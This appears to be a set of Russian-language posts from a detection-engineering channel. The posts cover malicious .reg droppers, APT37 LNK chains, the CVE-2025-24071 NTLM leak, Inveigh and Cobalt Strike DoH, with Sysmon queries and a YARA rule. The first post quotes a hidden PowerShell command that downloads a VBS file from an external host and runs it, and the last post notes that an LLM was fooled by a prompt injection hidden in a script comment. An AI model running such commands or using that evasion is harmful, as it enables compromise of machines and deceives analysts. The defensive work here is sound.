В ряде дроперов пополнение, хакеры используют *.reg-файлы 🩸



reg-файлы позволяют изменить значения ключей реестра.

В этом примере злоумышленники прислали PDF-файл, который содержит ссылку. Перейдя по ней пользователь скачает REG-файл.

При открытии reg-файла событие запуска процесса будет содержать

"regedit.exe" "C:\Users\admin\Downloads\pdf_graphics.reg"  

Данный файл создает ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SystemUpdate со значением

cmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://support.zyfex.free.hr/down/maze.vbs' -OutFile '%TEMP%\maze.vbs'; Start-Process '%TEMP%\maze.vbs

Такое поведение мы можем обнаружить:

🔤 создание процесса

ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "regedit.exe" and CommandLine="\.reg($|\s)

🔤 Создание reg-файлов в директориях пользователя

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and TargetFilename = "?:\Users\.*\.reg"

🔤 Добавим детект на основе ADS NTFS

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 15 and TargetFilename endswith ".reg:Zone.Identifier" and Contents=".*ZoneId=3.*"

Сэмпл в any.run

#detection@detectioneasy
#ttp@detectioneasy

В продолжение темы с LNK. Исследование TTP APT37 (ScarCruft, Reaper, Red Eyes)

🔤 Атака начинается с фишинга, содержащего ZIP-вложение, которое скрывает LNK
🔤 При выполнении файл LNK запускает multi-stage атаку с bat и PowerShell
🔤 Аргументы LNK проверяют рабочую директорию, затем рекурсивно ищут файл с определенным размером и расширением LNK в директории Temp
🔤 После обнаружения из LNK извлекается 1 hwpx (файл-приманка) и 3 dat-файла
🔤 Далее цепочка из скриптов загружает в память shellcode, для запуска RokRat. Для взаимодействия с C2 использовались API Dropbox, Yandex Disk и PCloud

Для поиска selfextracted-lnk можем похантить в аргументах cmd и powershell, вхождение Temp и LNK

#ttp@detectioneasy
#detection@detectioneasy

Вышел релиз Cobalt Strike 4.11, много интересных изменений. Меня больше зацепило использование DNS over HTTPS (DoH) для взаимодействия с сервером. Готовы к обнаружению?)

Список публичных DoH/DoT резолверов и еще один

Список всех обновлений CS 🐎 можно найти здесь

#ttp@detectioneasy

Очередной NTLM Response disclosure (CVE-2025-24071), вначале было интересно) сейчас хочется верить, что у всех закрыт доступ на внешние smb

Можем обнаружить 🔭:

🔤 В логах Security и Sysmon поискать сессии к порту 445

ProviderName="Microsoft-Windows-Security-Auditing" and EventId=5156 and DestAddress not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestPort=445
  

ProviderName="Microsoft-Windows-Sysmon" and EventId=3 and DestinationIp not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestinationPort=445

🔤 создание файла с раширением .library-ms

ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName endswith  "\\Users\\.*\.library-ms"

🔤 yara имеет смысл поискать в директориях пользователея (проверил, не фолсило)

rule detect_malicious_library_ms {
    meta:
        description = "Detects library-ms files with a search connector pointing"
        author = "@d3f0x0 @detectioneasy"
        reference = "CVE-2025-24071"
        date = "2025-03-19"
        score = 80

    strings:
        $xml_decl = /<\?xml\s+version\s*=\s*["']1\.0["']\s+encoding\s*=\s*["']UTF-8["']\s*\?>/ nocase
        
        $namespace = "https://schemas.microsoft.com/windows/2009/library"
        
        $url_pattern1 = /<url\b[^>]*>\s*\\\\/ wide ascii
        $url_pattern2 = /<\/url>/ wide ascii

        $connector_open = "<searchConnectorDescription>" wide ascii
        $connector_close = "</searchConnectorDescription>" wide ascii

    condition:
        all of ($xml_decl, $namespace, $url_pattern1, $url_pattern2 ) and
        2 of ($connector_open, $connector_close)
}

#detection@detectioneasy

Всем привет ✌️
Многими любимый Responder получил свое отражение на Powershell и C# в проекте Inveigh

Атакующие стараются не использовать его plaintext'ом и обфусцируют powershell или используют свой интерпретатор

Если Вам попались ребята, которые просто сделали git clone или скачали Release 👶 , проблем с ними нет

🔭 Обнаруживаем:
🔤 создание файлов с именем Inveigh
🔤 в логах Powershell вхождение inveigh, relay

Если хакеры подготовились обфусцировались, принесли с собой свой интерпретатор powershell:

🔤 Скорее всего оставили стандартное название логов, отслеживаем создание файлов по маскам

    $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
    $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
    $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
    $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
    $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"

🔤 если уже сильно запарились, и все поменяли, то формат хранения NTLMv2 Response, вряд ли будут менять, и в целом лог работы программы, поэтому берем строки вывода логов из скрипта формируем в yara и идем в поход по директориям пользователей

🔤 и для самых крутых, отойдем от tool-based, поднимемся выше по пирамиде боли к TTP 🤘

❗️ Суть атаки авторизовать на себя как можно больше хостов, для этого нужно поднять определенные сервера и заставить других клиентов подключаться к себе

Скорее всего подобного рода утилиты будут применяться в начале killchain для сбора учетных записей и информации об окружающей среде. Это дает нам вариант для профилирования поведения хостов.

🔤 Если у вас увеличилось количество подключений к хосту или в целом забиндились новые порты на пользовательских тачках - стоит проверить процесс, к которому подключаются.

🔤 Или наоборот, если хосты в широковещательном домене начали неожиданно подключаться к одному из хостов - необходимо его проверить

#detection@detectioneasy

Всем привет! ✌️

Прочитал статью от PT про внедрение LLM-агентов 🤖. Одно из направлений — это асистент для аналитика, интегрированный в SIEM или SOAR.

Встроенные агенты могут ускорить анализ скриптов, рассказать какие функции есть, попытаться снять обфускацию, дать описание аргументам командой строки или процессам.

В посте раннее получилось обмануть Deepseek внедрением промта в комментарии к скрипту. Что создает вектор для обхода средств обнаружения (обмана аналитика).

Внедрение агента в средства обнаружения может отрицательно повлиять на молодого аналитика и вызвать у него излишнее доверие к результатам. Это может быть следствием психологического феномена automation bias.

Automation bias понимают неосознанную склонность человека слепо доверять решениям, предлагаемым компьютером, особенно если они связаны с выполнением рабочей функции. При этом могут игнорироваться другие показатели, противоречащие рекомендации машины.

В OWASP Ttop 10 LLM - выделяли обман (дезинформация) в отдельную уязвимость.

Misinformation from LLMs poses a core vulnerability for applications relying on these models.
Misinformation occurs when LLMs produce false or misleading information that appears credible.
This vulnerability can lead to security breaches, reputational damage, and legal liability.

Одно из решений этой проблемы - внедрение ловушек в выдачу агента, чтобы поддерживать аналитика в тонусе.

#detection@detectioneasy